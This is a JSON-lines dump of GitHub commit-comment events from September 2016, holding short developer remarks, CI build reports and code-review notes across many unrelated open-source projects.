{"id":"4564237191","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"Team-OctOS/platform_device_samsung_jf-common"},"payload":{"comment":{"id":19025770,"position":null,"line":null,"path":null,"commit_id":"c544d6db41aa91aa019d7f0df24bff74f7764772","created_at":"2016-09-14T20:01:16Z","updated_at":"2016-09-14T20:01:16Z","body":"hey guys...why didnt u switch to new hal :) ? just curiosity"}},"created_at":"2016-09-14T20:01:16Z"}
{"id":"4564239700","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19025774,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-14T20:01:42Z","updated_at":"2016-09-14T20:01:42Z","body":"@garethbowen if they have to be above the header so I can float them to the right (yay the www) how can I have the below the header in mobile view? What CSS devilry is this?"}},"created_at":"2016-09-14T20:01:42Z"}
{"id":"4564245634","type":"CommitCommentEvent","actor":{"login":"mftaha"},"repo":{"name":"Scryptech/earth"},"payload":{"comment":{"id":19025783,"position":6,"line":337,"path":"public/css/landingcss/style.css","commit_id":"96f725d1fd69f32910e1ce6b468cc554ad2ddd1a","created_at":"2016-09-14T20:02:49Z","updated_at":"2016-09-14T20:02:49Z","body":"test"}},"created_at":"2016-09-14T20:02:49Z"}
{"id":"4564246339","type":"CommitCommentEvent","actor":{"login":"clyfe"},"repo":{"name":"dakrone/clj-http"},"payload":{"comment":{"id":19025785,"position":null,"line":null,"path":null,"commit_id":"7ec10113776655d04234edcb3238a5a50943980a","created_at":"2016-09-14T20:02:57Z","updated_at":"2016-09-14T20:02:57Z","body":"Meta hints might be agreeable:\r\n\r\n```clojure\r\n(http/get \"http://example.com\" {:query-params {:field ^:repeated [\"a\" \"b\" \"c\"]}}) ; default\r\n;; http://example.com?field=a&field=b&field=c\r\n\r\n(http/get \"http://example.com\" {:query-params {:field ^:array [\"a\" \"b\" \"c\"]}})\r\n;; http://example.com?field[]=a&field[]=b&field[]=c\r\n\r\n(http/get \"http://example.com\" {:query-params {:field ^:indexed [\"a\" \"b\" \"c\"]}})\r\n;; http://example.com?field[0]=a&field[1]=b&field[2]=c\r\n```\r\n"}},"created_at":"2016-09-14T20:02:57Z"}
{"id":"4564249762","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19025795,"position":null,"line":null,"path":null,"commit_id":"10b33afeec108e778c0a97e16a544cfc5377d3be","created_at":"2016-09-14T20:03:36Z","updated_at":"2016-09-14T20:03:36Z","body":"buildingunit (nmerket) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2360 of 2451 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.29%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T20:03:36Z"}
{"id":"4564250552","type":"CommitCommentEvent","actor":{"login":"Slayer95"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19025798,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-14T20:03:46Z","updated_at":"2016-09-14T20:03:46Z","body":"For different senders? O.o"}},"created_at":"2016-09-14T20:03:46Z"}
{"id":"4564252084","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19025802,"position":null,"line":null,"path":null,"commit_id":"3adae84fc13e292f8dc9d171d1c18fec16540da1","created_at":"2016-09-14T20:04:04Z","updated_at":"2016-09-14T20:04:04Z","body":"In the end, I don't think any of this uninitialized erasable, though suspicious, was actually causing me any problems. Rather, Solarium was looking for both DSKY key-presses and key-_releases_, and my DSKY simulator was only sending the key-presses.  So only the first keypress after power-up was ever processed by Solarium.  Completely-unrelated problem.  Still, the pad-load file isn't completely useless."}},"created_at":"2016-09-14T20:04:04Z"}
{"id":"4564252912","type":"CommitCommentEvent","actor":{"login":"keithbostic"},"repo":{"name":"wiredtiger/wiredtiger"},"payload":{"comment":{"id":19025805,"position":7,"line":835,"path":"src/evict/evict_lru.c","commit_id":"a14af94060c612ebbce5d52d743cb79014589cc1","created_at":"2016-09-14T20:04:13Z","updated_at":"2016-09-14T20:04:13Z","body":"@fedorova, just a style thing, we don't initialize variables in the declarations if there's any way around it.\r\n\r\nIf you're not aware of it, there's a configuration option `--enable-strict`. If you build with `--enable-strict --enable-diagnostic --enable-verbose`, you'll have pretty good flag coverage and be compiling in almost all of the code.\r\n\r\nI'm also happy to run your branch through my list of compilers and let you know if I spot anything, whenever it's ready."}},"created_at":"2016-09-14T20:04:13Z"}
{"id":"4564253382","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/Spartanizer"},"payload":{"comment":{"id":19025806,"position":null,"line":null,"path":null,"commit_id":"585095d4ef43ec73d2e83c60d1f7e3905ea32328","created_at":"2016-09-14T20:04:18Z","updated_at":"2016-09-14T20:04:18Z","body":"Yes, this only makes sense for local variables. Right? \r\n\r\nthe issue for the new wring is in the process of formation. I am sure we cannot do it for Version 2.5. When your environment stuff works, it would be snap to do."}},"created_at":"2016-09-14T20:04:18Z"}
{"id":"4564255129","type":"CommitCommentEvent","actor":{"login":"chetstone"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19025808,"position":null,"line":null,"path":null,"commit_id":"3a3ecc40d50b90a2a4dfe5a44f418d16ea942a50","created_at":"2016-09-14T20:04:36Z","updated_at":"2016-09-14T20:04:36Z","body":"I had a [problem](http://stackoverflow.com/questions/39476496/react-native-ios-app-doesnt-rerender-when-device-is-rotated/39498746#39498746) with my app not rerendering when the device was rotated that seems to have been fixed by this.."}},"created_at":"2016-09-14T20:04:36Z"}
{"id":"4564255479","type":"CommitCommentEvent","actor":{"login":"TecSeguridad"},"repo":{"name":"vitalidze/traccar-web"},"payload":{"comment":{"id":19025811,"position":null,"line":null,"path":null,"commit_id":"7a5196abd5c29fa3f4ad761a58c2c4e7d625507f","created_at":"2016-09-14T20:04:42Z","updated_at":"2016-09-14T20:04:42Z","body":"Can you indicate me the right Branch please?. I being trying for days to apply this solution but i always get some error (Net Bean, eclipse, decompilers, MAven, Javac, etc..) I almost give up. Thank you."}},"created_at":"2016-09-14T20:04:42Z"}
{"id":"4564259237","type":"CommitCommentEvent","actor":{"login":"lspdv"},"repo":{"name":"PyLadiesCZ/pyladies"},"payload":{"comment":{"id":19025819,"position":null,"line":null,"path":null,"commit_id":"fd6d3cf5960fc682c7f6c3fcfc28923e179ddbb5","created_at":"2016-09-14T20:05:24Z","updated_at":"2016-09-14T20:05:24Z","body":"K to u rozesazeni dle operacniho systemu. Nerada bych Ti brala zasluhy, ale myslim ze spis pomohlo, ze jsme se kazde u prichodu konkretne zeptaly a posadili budto k oknu (win) nebo ke strane dveri (linux a os x). \r\n\r\nNevim na co by se rad nekdo z nich pripojoval na monitory, je potreba mozna priste zduraznit, ze nemame dovoleno je pouzivat. Asi jsme to nerekli a je to dulezite. Reknu to Zuzce K.\r\n\r\nTen feedback ohledne 3x stahovani. No slecna bohuzel zaujala velmi pasivni postoj. Naprosto presne vim, kdo to psal. Chtela jsem dodat vyklad ohledne venv nacez jsem bohuzel dostala odpoved \"ja se zeptam RADEJI kolegy v praci, on mi to vysvetli\" ano prikazy byly zmatene jelikoz sedela v casti pro Unix a ja na ni chrlila ls misto dir. To, ze sedela jinde bylo zpusobeno tim, ze prisla pozde a nechteli jsme rusit.\r\n\r\nTake chci byt jako Zuzka! :rose: \r\n\r\n"}},"created_at":"2016-09-14T20:05:24Z"}
{"id":"4564269641","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19025835,"position":5,"line":98,"path":"templates/partials/contacts_content.html","commit_id":"82dd1d7b3265ee7e142da25d7151c3c77c670ab8","created_at":"2016-09-14T20:07:15Z","updated_at":"2016-09-14T20:07:15Z","body":"You can have the filters below the heading if you float the filters right, and float the heading left. The filters then need some padding to line up right, and you'll have to clear:both on the next element (or add a wrapping element). Then on mobile you turn off both floats and it just works."}},"created_at":"2016-09-14T20:07:15Z"}
{"id":"4564270581","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19025839,"position":null,"line":null,"path":null,"commit_id":"9129b400badd0cd3758267e75ae868f093bc807d","created_at":"2016-09-14T20:07:25Z","updated_at":"2016-09-14T20:07:25Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-MacOS-10.9-clang: OK (2328 of 2329 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9129b400badd0cd3758267e75ae868f093bc807d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T20:07:25Z"}
{"id":"4564273922","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19025850,"position":24,"line":24,"path":"decomposer.erl","commit_id":"de054a8d56078be166bd9f1e3df7e20591153d1e","created_at":"2016-09-14T20:08:04Z","updated_at":"2016-09-14T20:08:04Z","body":"These cases return a `ok` `frame` record and options, right? What if the result of the case evaluation was the `Cmd1` `Cmd2` pair which then could use to build a frame via a single `frame` record initialization?"}},"created_at":"2016-09-14T20:08:04Z"}
{"id":"4564277420","type":"CommitCommentEvent","actor":{"login":"zador-blood-stained"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":19025854,"position":null,"line":null,"path":null,"commit_id":"a02d5177bb09da008aaf8c625eddd63295ca4a2d","created_at":"2016-09-14T20:08:43Z","updated_at":"2016-09-14T20:08:43Z","body":"@igorpecovnik \r\nPlease check if you need to rebuild legacy images for Pi Plus and Pi Plus 2E to include this change."}},"created_at":"2016-09-14T20:08:43Z"}
{"id":"4564280546","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19025861,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:09:20Z","updated_at":"2016-09-14T20:09:20Z","body":"This is much better for version control. However, after using watchify, with `npm run watch`, I do not manage to obtain the same `main.js` even though I made no changes. I tried both `npm bundle` and `npm bundleProduction`. (??) Whats the command you used to create `main.js` ?"}},"created_at":"2016-09-14T20:09:20Z"}
{"id":"4564284392","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19025869,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T20:10:07Z","updated_at":"2016-09-14T20:10:07Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2369 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T20:10:07Z"}
{"id":"4564287678","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19025877,"position":null,"line":null,"path":null,"commit_id":"10b33afeec108e778c0a97e16a544cfc5377d3be","created_at":"2016-09-14T20:10:43Z","updated_at":"2016-09-14T20:10:43Z","body":"buildingunit (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-10b33afeec108e778c0a97e16a544cfc5377d3be-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-14T20:10:43Z"}
{"id":"4564288378","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19025880,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-14T20:10:50Z","updated_at":"2016-09-14T20:10:50Z","body":"[CvGameCore_Expansion2.zip](https://github.com/LoneGazebo/Community-Patch-DLL/files/473377/CvGameCore_Expansion2.zip)\r\n"}},"created_at":"2016-09-14T20:10:50Z"}
{"id":"4564288435","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19025881,"position":null,"line":null,"path":null,"commit_id":"807f5dcd9ba4c07f9737943a7a14893c003e3cce","created_at":"2016-09-14T20:10:51Z","updated_at":"2016-09-14T20:10:51Z","body":"so that the width default can be \"auto\" from the stylesheet. height is now a first-class metric since a couple of commits ago\r\n\r\nthe Testing tab can be used to reset a Pico's rounded rectangle to the original values by leaving width blank and entering 100 for height then sending visual/config"}},"created_at":"2016-09-14T20:10:51Z"}
{"id":"4564295089","type":"CommitCommentEvent","actor":{"login":"fletchgqc"},"repo":{"name":"fletchgqc/cai-theme"},"payload":{"comment":{"id":19025897,"position":6,"line":17,"path":"cai_2012/html.tpl.php","commit_id":"b6db2b953f4763218acf8c7791345f6a45d014bb","created_at":"2016-09-14T20:12:11Z","updated_at":"2016-09-14T20:12:11Z","body":"You're supposed to do this with drupal itself, rather than hard-coding it. It should work with drupal_add_library('system', 'ui'); \r\ninside function cai_2012_preprocess_page(&$variables){ in template.tpl.php, but I was having some trouble with this tonight. Might have been for some other reason...."}},"created_at":"2016-09-14T20:12:11Z"}
{"id":"4564296267","type":"CommitCommentEvent","actor":{"login":"dirk-thomas"},"repo":{"name":"ros2/rmw"},"payload":{"comment":{"id":19025901,"position":15,"line":15,"path":"rmw/test/CMakeLists.txt","commit_id":"1b28064c8ba75809a2e097a4d8951331022803f9","created_at":"2016-09-14T20:12:24Z","updated_at":"2016-09-14T20:12:24Z","body":"This line results in a warning on Windows: http://ci.ros2.org/job/ci_windows/1651/consoleFull search for \"ignoring unknown option\".\r\n\r\nSadly Jenkins doesn't extract it correctly but that is a different story."}},"created_at":"2016-09-14T20:12:24Z"}
{"id":"4564297094","type":"CommitCommentEvent","actor":{"login":"alternatebow"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19025903,"position":null,"line":null,"path":null,"commit_id":"5d7875c12ca578e02ba678fd6ac94024f27e9ecf","created_at":"2016-09-14T20:12:33Z","updated_at":"2016-09-14T20:12:33Z","body":"So what was wrong with my implementation? "}},"created_at":"2016-09-14T20:12:33Z"}
{"id":"4564297878","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19025904,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:12:42Z","updated_at":"2016-09-14T20:12:42Z","body":"Strange. It is indeed just `npm run bundleProduction`. I use `BROWSERIFYSWAP_ENV='development' npm run bundleProduction` in detail but this is only necessary if you used BROWSERIFYSWAP_ENV='production' before.\r\n\r\nSo \"development\" should be default and picks the options.js"}},"created_at":"2016-09-14T20:12:42Z"}
{"id":"4564298722","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19025906,"position":null,"line":null,"path":null,"commit_id":"8499afd68a7a5238c88afec06519cfc80013c850","created_at":"2016-09-14T20:12:52Z","updated_at":"2016-09-14T20:12:52Z","body":"this AI was really bad... it should be similar to pure entities "}},"created_at":"2016-09-14T20:12:52Z"}
{"id":"4564299807","type":"CommitCommentEvent","actor":{"login":"sqwishy"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19025908,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T20:13:06Z","updated_at":"2016-09-14T20:13:06Z","body":"That sounds familiar. You could be totally right about that.\r\n\r\nI haven't used Godot since around the time I made this. I thought for some reason it did still work -- maybe -- but I don't really remember the details. It's entirely possible that I just never ended up trying to run anything I wrote and that it's all broken because it's using spaces."}},"created_at":"2016-09-14T20:13:06Z"}
{"id":"4564301374","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19025909,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:13:22Z","updated_at":"2016-09-14T20:13:22Z","body":"It is even stranger as we pick explicit versions in package.json"}},"created_at":"2016-09-14T20:13:22Z"}
{"id":"4564303471","type":"CommitCommentEvent","actor":{"login":"femnad"},"repo":{"name":"femnad/tbd"},"payload":{"comment":{"id":19025917,"position":38,"line":41,"path":"composer.erl","commit_id":"d71a6c60eea414b95ed650a5b4bc2fddef680985","created_at":"2016-09-14T20:13:46Z","updated_at":"2016-09-14T20:13:46Z","body":"A newline would be suitable here, cause I first thought the function definition continued on the next lines."}},"created_at":"2016-09-14T20:13:46Z"}
{"id":"4564305159","type":"CommitCommentEvent","actor":{"login":"thisisaaronland"},"repo":{"name":"whosonfirst-data/whosonfirst-data-venue-us-ny"},"payload":{"comment":{"id":19025920,"position":null,"line":null,"path":null,"commit_id":"f67cc5487e388c1a3f986dff856ecb2fd3aaa4be","created_at":"2016-09-14T20:14:07Z","updated_at":"2016-09-14T20:14:07Z","body":"A couple comments:\r\n\r\n1. lower case properties, just so that it's not a question\r\n2. maybe use one/two character names for days? M,T,W,H,F,Sa,Su or whatever (insert standards body) here says"}},"created_at":"2016-09-14T20:14:07Z"}
{"id":"4564307667","type":"CommitCommentEvent","actor":{"login":"soulaimanitani"},"repo":{"name":"Scryptech/earth"},"payload":{"comment":{"id":19025928,"position":6,"line":337,"path":"public/css/landingcss/style.css","commit_id":"96f725d1fd69f32910e1ce6b468cc554ad2ddd1a","created_at":"2016-09-14T20:14:33Z","updated_at":"2016-09-14T20:14:33Z","body":"??\n\nS\n\nOn Wed, Sep 14, 2016 at 1:02 PM, Mohamad Fayez Taha <\nnotifications@github.com> wrote:\n\n> test\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Scryptech/earth/commit/96f725d1fd69f32910e1ce6b468cc554ad2ddd1a#commitcomment-19025783>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APtD60rpDaP9R0aH3po1Enexytvl1FCQks5qqFLpgaJpZM4J9Lmg>\n> .\n>\n"}},"created_at":"2016-09-14T20:14:33Z"}
{"id":"4564310692","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19025935,"position":null,"line":null,"path":null,"commit_id":"304bb351f6f5268acc8156d1bbc2747d6324ca8b","created_at":"2016-09-14T20:15:07Z","updated_at":"2016-09-14T20:15:07Z","body":"Build report #159986899 for sha 304bb351f6f5268acc8156d1bbc2747d6324ca8b:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%280/0%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-0.00%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-0%20/%200%20%280.00%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-0.00%20%25-yellow.svg)](#)\n"}},"created_at":"2016-09-14T20:15:07Z"}
{"id":"4564316659","type":"CommitCommentEvent","actor":{"login":"mftaha"},"repo":{"name":"Scryptech/earth"},"payload":{"comment":{"id":19025949,"position":6,"line":337,"path":"public/css/landingcss/style.css","commit_id":"96f725d1fd69f32910e1ce6b468cc554ad2ddd1a","created_at":"2016-09-14T20:16:15Z","updated_at":"2016-09-14T20:16:15Z","body":"testing a new github feature 😭 "}},"created_at":"2016-09-14T20:16:15Z"}
{"id":"4564318458","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19025952,"position":19,"line":19,"path":"backend/src/main/java/ru/avito/HTTPDownloader/HttpDownloadUtility.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T20:16:34Z","updated_at":"2016-09-14T20:16:34Z","body":"Такие вещи надо задавать в файлах .properties"}},"created_at":"2016-09-14T20:16:34Z"}
{"id":"4564319935","type":"CommitCommentEvent","actor":{"login":"kermitt2"},"repo":{"name":"laurentromary/IFIPSpecifications"},"payload":{"comment":{"id":19025956,"position":null,"line":null,"path":null,"commit_id":"eae199ff3b7df09133221573a13b658ae14da04e","created_at":"2016-09-14T20:16:51Z","updated_at":"2016-09-14T20:16:51Z","body":"to avoid this ugly Mac OS hidden files, create a .gitignore file and put as content:\r\n   \r\n    .DS_Store"}},"created_at":"2016-09-14T20:16:51Z"}
{"id":"4564320799","type":"CommitCommentEvent","actor":{"login":"aq1018"},"repo":{"name":"aq1018/mongoid-history"},"payload":{"comment":{"id":19025960,"position":null,"line":null,"path":null,"commit_id":"75c200fba411530047c1c23a750aff05f93ac836","created_at":"2016-09-14T20:17:01Z","updated_at":"2016-09-14T20:17:01Z","body":"Transfered\n\nOn Wed, Sep 14, 2016 at 9:09 AM Daniel Doubrovkine (dB.) @dblockdotorg <\nnotifications@github.com> wrote:\n\n> @aq1018 <https://github.com/aq1018> Done. Deleted mine.\n>\n> —\n>\n>\n> You are receiving this because you were mentioned.\n>\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aq1018/mongoid-history/commit/75c200fba411530047c1c23a750aff05f93ac836#commitcomment-19021786>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AABG3GwypnqfPZHmo68SUZQ80CQm5M-Dks5qqBxUgaJpZM4J72bD>\n> .\n>\n"}},"created_at":"2016-09-14T20:17:01Z"}
{"id":"4564322384","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19025967,"position":null,"line":null,"path":null,"commit_id":"91c07c5227361ac051e7c27ef468aacea711c677","created_at":"2016-09-14T20:17:19Z","updated_at":"2016-09-14T20:17:19Z","body":"makingPrettyTransition (mitchute) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91c07c5227361ac051e7c27ef468aacea711c677-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T20:17:19Z"}
{"id":"4564326249","type":"CommitCommentEvent","actor":{"login":"shubhamkushwah123"},"repo":{"name":"shubhamkushwah123/TwitterStreamingApi"},"payload":{"comment":{"id":19025984,"position":null,"line":null,"path":null,"commit_id":"d9f9749f6a437e7e54690d7eab46f3cd2f33abbf","created_at":"2016-09-14T20:18:03Z","updated_at":"2016-09-14T20:18:03Z","body":"sdfsaf"}},"created_at":"2016-09-14T20:18:03Z"}
{"id":"4564326998","type":"CommitCommentEvent","actor":{"login":"pavelMojo"},"repo":{"name":"pavelMojo/ChemWebApp"},"payload":{"comment":{"id":19025990,"position":null,"line":null,"path":null,"commit_id":"2108ea308ad5ac4a20bfa1345b13ec100209cb65","created_at":"2016-09-14T20:18:13Z","updated_at":"2016-09-14T20:18:13Z","body":"Информация о проекте"}},"created_at":"2016-09-14T20:18:13Z"}
{"id":"4564328201","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"cvut/MI-PYT"},"payload":{"comment":{"id":19025998,"position":32,"line":205,"path":"tutorials/02_flask.md","commit_id":"e10d6028b99c16fa03f519f1272d267545b5c16c","created_at":"2016-09-14T20:18:26Z","updated_at":"2016-09-14T20:18:26Z","body":"Díky, commitnuto jako fixup"}},"created_at":"2016-09-14T20:18:26Z"}
{"id":"4564330900","type":"CommitCommentEvent","actor":{"login":"AntonioModer"},"repo":{"name":"AlexarJING/box2dhelper"},"payload":{"comment":{"id":19026011,"position":null,"line":null,"path":null,"commit_id":"762944d3cc95388db3f5af4b38719d187e299726","created_at":"2016-09-14T20:18:55Z","updated_at":"2016-09-14T20:18:55Z","body":"WOW OoO.\r\nWith this polybool.lua, maybe i can make navmeshes (https://love2d.org/forums/viewtopic.php?f=5&t=81229)\r\nAlexar, thank you so much!"}},"created_at":"2016-09-14T20:18:55Z"}
{"id":"4564331338","type":"CommitCommentEvent","actor":{"login":"shubhamkushwah123"},"repo":{"name":"shubhamkushwah123/TwitterStreamingApi"},"payload":{"comment":{"id":19026013,"position":null,"line":null,"path":null,"commit_id":"d9f9749f6a437e7e54690d7eab46f3cd2f33abbf","created_at":"2016-09-14T20:19:00Z","updated_at":"2016-09-14T20:19:00Z","body":"deleted"}},"created_at":"2016-09-14T20:19:00Z"}
{"id":"4564332542","type":"CommitCommentEvent","actor":{"login":"ahuarte47"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19026019,"position":null,"line":null,"path":null,"commit_id":"632da6371741787c93fd667382247dc736847249","created_at":"2016-09-14T20:19:14Z","updated_at":"2016-09-14T20:19:14Z","body":"Thanks @m-kuhn for this commit!"}},"created_at":"2016-09-14T20:19:14Z"}
{"id":"4564333699","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19026022,"position":13,"line":1022,"path":"src/help/help_impl.cpp","commit_id":"476027f239f2c86169ad088bbfe6024c0ad2d1f6","created_at":"2016-09-14T20:19:26Z","updated_at":"2016-09-14T20:19:26Z","body":"So uhh... this needs to be reimplemented, right? What's it used for?"}},"created_at":"2016-09-14T20:19:26Z"}
{"id":"4564334857","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19026024,"position":31,"line":110,"path":"src/logger.c","commit_id":"304da88035303e12696deadfb4ed6a3ecb41c4c9","created_at":"2016-09-14T20:19:40Z","updated_at":"2016-09-14T20:19:40Z","body":"This code is NOT portable. It was before."}},"created_at":"2016-09-14T20:19:40Z"}
{"id":"4564339637","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":19026032,"position":null,"line":null,"path":null,"commit_id":"256b6a7a05b4e5abaef612aa3868017cd4386e54","created_at":"2016-09-14T20:20:34Z","updated_at":"2016-09-14T20:20:34Z","body":"Amazing!"}},"created_at":"2016-09-14T20:20:34Z"}
{"id":"4564345420","type":"CommitCommentEvent","actor":{"login":"Rhatje"},"repo":{"name":"jerodev/pokedex-irc-bot"},"payload":{"comment":{"id":19026048,"position":null,"line":null,"path":null,"commit_id":"fe2fb9a9682db3b085d3255c9852a39f702009c1","created_at":"2016-09-14T20:21:39Z","updated_at":"2016-09-14T20:21:39Z","body":"Added trimming of whitspaces to %param%"}},"created_at":"2016-09-14T20:21:39Z"}
{"id":"4564346287","type":"CommitCommentEvent","actor":{"login":"ammagamma"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":19026052,"position":null,"line":null,"path":null,"commit_id":"c9a9adad70c1ae0830387eed4da02d4c40e03ecd","created_at":"2016-09-14T20:21:49Z","updated_at":"2016-09-14T20:21:49Z","body":"hmm looks like some of the randomized variable names are different. Might be related to different node versions  (no idea really, but definitely annoying ;) ) ?"}},"created_at":"2016-09-14T20:21:49Z"}
